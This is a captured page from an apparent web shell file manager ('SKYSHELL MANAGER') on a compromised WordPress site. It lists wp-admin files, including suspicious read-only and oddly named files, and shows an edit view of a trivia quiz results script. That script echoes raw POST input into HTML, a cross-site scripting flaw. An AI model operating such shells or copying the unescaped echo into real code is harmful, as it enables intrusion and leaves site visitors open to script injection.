📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: Answers.php
<?php $q1 = $_POST["q1"]; $q2 = $_POST["q2"]; $q3 = $_POST["q3"]; $q4 = $_POST["q4"]; $q5 = $_POST["q5"]; $q6 = $_POST["q6"]; $q7 = $_POST["q7"]; $q8 = $_POST["q8"]; $q9 = $_POST["q9"]; $q10 = $_POST["q10"]; ?> <html> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <head> <style> .heading { margin-left: 1.25cm; } @media only screen and (max-width: 500px) { .heading { margin-left: 0.25cm; } } .lighttable { background: #eeeeff; color: #000000; } .tableborders { background: #CCCCFF; } .menubar { background: #CCCCFF; color: blue; } center{ display: block; text-align: -webkit-center; } BODY, P, TABLE, TD, TR { font-size: 15px; font-family: Arial,Helvetica; color: #000000; } table { white-space: normal; line-height: normal; font-weight: normal; font-size: medium; font-style: normal; color: -internal-quirk-inherit; text-align: start; font-variant: normal; } </style> </head> <body style="background-color: #1d435a;"> <table width="95.1%" class="tableborders heading" cellpadding="3" cellspacing="1" > <tbody><tr> <td align="center" class="menubar"> <center> <center><font size="+2">Quiz Results for <font color="green">Daily Email Trivia</font></font></center> </center> </td> </tr> </tbody></table> <table width="95%" align="center"><tbody><tr><td> <table class="lighttable" width="100%" cellpadding="6"><tbody><tr><td valign="top" width="60"> <?php if($q1=='Sonic'){?> <img src="images/check.gif" width="32" height="32"> <?php }elseif(($q1!='Sonic') || ($q1=='')){ ?> <img src="images/wrong.gif" width="32" height="32"> <?php } ?> </td> <td valign="top"> <font size="+1">1. What is the name of the super-quick blue HEDGEhog from the famous video game series of the same name?</font><p> <?php if($q1=='Sonic'){?> Your answer: <font color="green"> <?php echo $q1; ?></font></p><p> <?php }elseif(($q1!='Sonic') && ($q1!='')){ ?> Your answer: <font color="red"> <?php echo $q1; ?></font></p><p> The correct answer was <b>Sonic</b></p><p> <?php }elseif($q1==''){?> You <b>did not</b> answer this question.</p><p> <?php }?> <font color="darkblue"><b>Like Mario is to Nintendo, Sonic is to Sega. He's a blue anthropomorphic hedgehog who's super quick. He is the titular character of a popular video game series which started in 1991 with the release of "Sonic the Hedgehog" for the Sega Genesis (or Mega Drive). He's now appeared in a number of games as well as television series, comic books, movies and more. He's also teamed up with a few other characters, like in the "Mario and Sonic" game series. In 2005, he was named one of the first inductees for the "Walk of Game". Spyro is a video game dragon from the "Spyro" games, Crash a bandicoot from "Crash Bandicoot" and Banjo a bear from "Banjo Kazooie". </b></font></p><p> </p></td></tr></tbody></table> <br> <table class="lighttable" width="100%" cellpadding="6"><tbody><tr><td valign="top" width="60"> <?php if($q2=='Tell the barn manager/owner'){?> <img src="images/check.gif" width="32" height="32"> <?php }elseif(($q2!='Tell the barn manager/owner') || ($q2=='')){ ?> <img src="images/wrong.gif" width="32" height="32"> <?php } ?> </td> <td valign="top"> <font size="+1">2. If you see a fence broken and a horse could possibly get loose, what should you do?</font><p> <?php if($q2=='Tell the barn manager/owner'){?> Your answer: <font color="green"> <?php echo $q2; ?></font></p><p> <?php }elseif(($q2!='Tell the barn manager/owner') && ($q2!='')){ ?> Your answer: <font color="red"> <?php echo $q2; ?></font></p><p> The correct answer was <b>Tell the barn manager/owner</b></p><p> <?php }elseif($q2==''){?> You <b>did not</b> answer this question.</p><p> <?php }?> <font color="darkblue"><b>You always want to tell the barn manager/owner. If a horse could get out, either lead the horse out or wait for help. Then tell the barn manager or owner.</b></font></p><p> </p></td></tr></tbody></table> <br> <table class="lighttable" width="100%" cellpadding="6"><tbody><tr><td valign="top" width="60"> <?php if($q3=='Boston'){?> <img src="images/check.gif" width="32" height="32"> <?php }elseif(($q3!='Boston') || ($q3=='')){ ?> <img src="images/wrong.gif" width="32" height="32"> <?php } ?> </td> <td valign="top"> <font size="+1">3. 63: What is the name of the fantastic band that performed "More Than a Feeling" and "Foreplay/Long Time"?</font><p> <?php if($q3=='Boston'){?> Your answer: <font color="green"> <?php echo $q3; ?></font></p><p> <?php }elseif(($q3!='Boston') && ($q3!='')){ ?> Your answer: <font color="red"> <?php echo $q3; ?></font></p><p> The correct answer was <b>Boston</b></p><p> <?php }elseif($q3==''){?> You <b>did not</b> answer this question.</p><p> <?php }?> <font color="darkblue"><b>Boston formed in Boston, Massachusetts. "More Than A Feeling" and "Foreplay/Long Time" were included on their self-titled debut album in 1976.</b></font></p><p> </p></td></tr></tbody></table> <br> <table class="lighttable" width="100%" cellpadding="6"><tbody><tr><td valign="top" width="60"> <?php if($q4=='Cabaret'){?> <img src="images/check.gif" width="32" height="32"> <?php }elseif(($q4!='Cabaret') || ($q4=='')){ ?> <img src="images/wrong.gif" width="32" height="32"> <?php } ?> </td> <td valign="top"> <font size="+1">4. "Start by admitting from cradle to tomb, it isn't that long a stay. Life is a ________, old chum, come to the _______". Fill in the blank.</font><p> <?php if($q4=='Cabaret'){?> Your answer: <font color="green"> <?php echo $q4; ?></font></p><p> <?php }elseif(($q4!='Cabaret') && ($q4!='')){ ?> Your answer: <font color="red"> <?php echo $q4; ?></font></p><p> The correct answer was <b>Cabaret</b></p><p> <?php }elseif($q4==''){?> You <b>did not</b> answer this question.</p><p> <?php }?> <font color="darkblue"><b>In 1973 "Cabaret" swept to ten Academy Award nominations, winning eight. They included Best Director, Bob Fosse; Best Lead Actress,Liza Minnelli; and Best Supporting Actor, Joel Grey. Certainly this film is Minnelli's finest piece of work, Grey is creepy as the MC, and Fosse's talent as a choreographer shines through. In the middle of the film a chorus of young Nazis sing "Tomorrow Belongs to Me" which sends shivers up your back as you know the horrors to come. It was based on the play "I Am a Camera". The film deals with the era in Germany just before the World War Two. The cabaret is a microcosm of society and change foreshadowing the horror and the holocaust. Highlights:Joel Grey's "Willkommen" and "Money, Money". Liza Minnelli's "Maybe This Time" and, of course, "Cabaret".</b></font></p><p> </p></td></tr></tbody></table> <br> <table class="lighttable" width="100%" cellpadding="6"><tbody><tr><td valign="top" width="60"> <?php if($q5=='Subway'){?> <img src="images/check.gif" width="32" height="32"> <?php }elseif(($q5!='Subway') || ($q5=='')){ ?> <img src="images/wrong.gif" width="32" height="32"> <?php } ?> </td> <td valign="top"> <font size="+1">5. This restaurant was first opened in Bridgeport, Connecticut in 1965. In 1999 an Indiana University student named Jared Fogle became their spokesman after, on a diet of mostly their food, he lost 245 pounds.</font><p> <?php if($q5=='Subway'){?> Your answer: <font color="green"> <?php echo $q5; ?></font></p><p> <?php }elseif(($q5!='Subway') && ($q5!='')){ ?> Your answer: <font color="red"> <?php echo $q5; ?></font></p><p> The correct answer was <b>Subway</b></p><p> <?php }elseif($q5==''){?> You <b>did not</b> answer this question.</p><p> <?php }?> <font color="darkblue"><b>Stemming from a sandwich shop opened by one of the founders, Peter Buck, Subway was originally called "Pete's Submarines". However, during radio advertisements, the name of the shop sounded more like "Pizza Marines", so the name was changed to "Pete's Subway", and eventually just plain "Subway".</b></font></p><p> </p></td></tr></tbody></table> <br> <table class="lighttable" width="100%" cellpadding="6"><tbody><tr><td valign="top" width="60"> <?php if($q6=='The Mafia'){?> <img src="images/check.gif" width="32" height="32"> <?php }elseif(($q6!='The Mafia') || ($q6=='')){ ?> <img src="images/wrong.gif" width="32" height="32"> <?php } ?> </td> <td valign="top"> <font size="+1">6. The term "La Cosa Nostra" is another term sometimes used to describe what sprawling crime syndicate?</font><p> <?php if($q6=='The Mafia'){?> Your answer: <font color="green"> <?php echo $q6; ?></font></p><p> <?php }elseif(($q6!='The Mafia') && ($q6!='')){ ?> Your answer: <font color="red"> <?php echo $q6; ?></font></p><p> The correct answer was <b>The Mafia</b></p><p> <?php }elseif($q6==''){?> You <b>did not</b> answer this question.</p><p> <?php }?> <font color="darkblue"><b>The Mafia originated in Italy, but no one is exactly sure when! It's been a long time, though, just like there have been a lot of movies made about The Mafia, including "The Godfather" trilogy, "Goodfellas", "Casino", and many others. "La Cosa Nostra" is an Italian phrase meaning "Our Thing". </b></font></p><p> </p></td></tr></tbody></table> <br> <table class="lighttable" width="100%" cellpadding="6"><tbody><tr><td valign="top" width="60"> <?php if($q7=='Catherine Zeta Jones'){?> <img src="images/check.gif" width="32" height="32"> <?php }elseif(($q7!='Catherine Zeta Jones') || ($q7=='')){ ?> <img src="images/wrong.gif" width="32" height="32"> <?php } ?> </td> <td valign="top"> <font size="+1">7. Which actress played Velma Kelly in the 2002 movie "Chicago"?</font><p> <?php if($q7=='Catherine Zeta Jones'){?> Your answer: <font color="green"> <?php echo $q7; ?></font></p><p> <?php }elseif(($q7!='Catherine Zeta Jones') && ($q7!='')){ ?> Your answer: <font color="red"> <?php echo $q7; ?></font></p><p> The correct answer was <b>Catherine Zeta Jones</b></p><p> <?php }elseif($q7==''){?> You <b>did not</b> answer this question.</p><p> <?php }?> <font color="darkblue"><b>In this movie, Catherine gave it her all as club singer, Velma who was accused of killing her husband and sister. Catherine portrayed her character very well, throwing her weight around as the star while in prison. Jones was nominated for several awards for her role as Velma Kelly. This included winning Best Supporting Actress from three different awards: Academy, BAFTA Award (British Academy of Film and Television Arts Awards) and Broadcasting Film Critics Association Award. Also she won Boston Society of Film Critics Awards 2nd place supporting actress. "Chicago" won six Academy Awards and won 31 other awards and was nominated for 52. Catherine Zeta Jones was born on September 25, 1969, in Swansea, West Glamorgan, Wales, UK. Did you know she shared the same birthday as her husband, Michael Douglas? She also appeared in the movies "Titanic" (1996 miniseries), "Mask of Zorro" (1998), "The Terminal" (2004), "Ocean's Twelve" (2004), and "Legend of Zorro" (2005).</b></font></p><p> </p></td></tr></tbody></table> <br> <table class="lighttable" width="100%" cellpadding="6"><tbody><tr><td valign="top" width="60"> <?php if($q8=='Shakespeare\'s "Richard III"'){?> <img src="images/check.gif" width="32" height="32"> <?php }elseif(($q8!='Shakespeare\'s "Richard III"') || ($q8=='')){ ?> <img src="images/wrong.gif" width="32" height="32"> <?php } ?> </td> <td valign="top"> <font size="+1">8. Steinbeck's "The Winter of Our Discontent" is from:</font><p> <?php if($q8=='Shakespeare\'s "Richard III"'){?> Your answer: <font color="green"> <?php echo $q8; ?></font></p><p> <?php }elseif(($q8!='Shakespeare\'s "Richard III"') && ($q8!='')){ ?> Your answer: <font color="red"> <?php echo $q8; ?></font></p><p> The correct answer was <b>Shakespeare's "Richard III"</b></p><p> <?php }elseif($q8==''){?> You <b>did not</b> answer this question.</p><p> <?php }?> <font color="darkblue"><b>Rack another one up for Bill. From Act I, Scene I.</b></font></p><p> </p></td></tr></tbody></table> <br> <table class="lighttable" width="100%" cellpadding="6"><tbody><tr><td valign="top" width="60"> <?php if($q9=='United States'){?> <img src="images/check.gif" width="32" height="32"> <?php }elseif(($q9!='United States') || ($q9=='')){ ?> <img src="images/wrong.gif" width="32" height="32"> <?php } ?> </td> <td valign="top"> <font size="+1">9. What is the most populous 'U' country?</font><p> <?php if($q9=='United States'){?> Your answer: <font color="green"> <?php echo $q9; ?></font></p><p> <?php }elseif(($q9!='United States') && ($q9!='')){ ?> Your answer: <font color="red"> <?php echo $q9; ?></font></p><p> The correct answer was <b>United States</b></p><p> <?php }elseif($q9==''){?> You <b>did not</b> answer this question.</p><p> <?php }?> <font color="darkblue"><b>The United States has a population of 314 million and ranks #3 in the world behind China and India. Source: World Gazetteer (2012)</b></font></p><p> </p></td></tr></tbody></table> <br> <table class="lighttable" width="100%" cellpadding="6"><tbody><tr><td valign="top" width="60"> <?php if($q10=='All are benefits to quitting smoking'){?> <img src="images/check.gif" width="32" height="32"> <?php }elseif(($q10!='All are benefits to quitting smoking') || ($q10=='')){ ?> <img src="images/wrong.gif" width="32" height="32"> <?php } ?> </td> <td valign="top"> <font size="+1">10. Which of these is a benefit of quitting smoking?</font><p> <?php if($q10=='All are benefits to quitting smoking'){?> Your answer: <font color="green"> <?php echo $q10; ?></font></p><p> <?php }elseif(($q10!='All are benefits to quitting smoking') && ($q10!='')){ ?> Your answer: <font color="red"> <?php echo $q10; ?></font></p><p> The correct answer was <b>All are benefits to quitting smoking</b></p><p> <?php }elseif($q10==''){?> You <b>did not</b> answer this question.</p><p> <?php }?> <font color="darkblue"><b>Additionally, think of all the self-confidence you will gain by quitting smoking! (Best of all, your significant other won't have to kiss an ashtray anymore!)</b></font></p><p> </p></td></tr> <tr> </tbody></table> <br> </td></tr></tbody></table> <table width="95.1%" class="tableborders heading" cellpadding="3" cellspacing="1" style="background-color:#a6c8f6;"> <tbody><tr> <td align="left" class="menubar"> <?php $q1_ans = "Sonic"; $q2_ans = "Tell the barn manager/owner"; $q3_ans = "Boston"; $q4_ans = "Cabaret"; $q5_ans = "Subway"; $q6_ans = "The Mafia"; $q7_ans = "Catherine Zeta Jones"; $q8_ans = "Shakespeare's \"Richard III\""; $q9_ans = "United States"; $q10_ans = "All are benefits to quitting smoking"; $score= 0; if($q1 == $q1_ans){ $score =$score + 1; }if($q2 == $q2_ans){ $score =$score + 1; }if($q3 == $q3_ans){ $score =$score + 1; }if($q4 == $q4_ans){ $score =$score + 1; }if($q5 == $q5_ans){ $score =$score + 1; }if($q6 == $q6_ans){ $score =$score + 1; }if($q7 == $q7_ans){ $score =$score + 1; }if($q8 == $q8_ans){ $score =$score + 1; }if($q9 == $q9_ans){ $score =$score + 1; }if($q10 == $q10_ans){ $score =$score + 1; } ?> <font size="+2">Your score: <font color="purple"> <?php echo $score;?>/ 10<br></font> </td> </tr> </tbody></table> </body> </html>
Save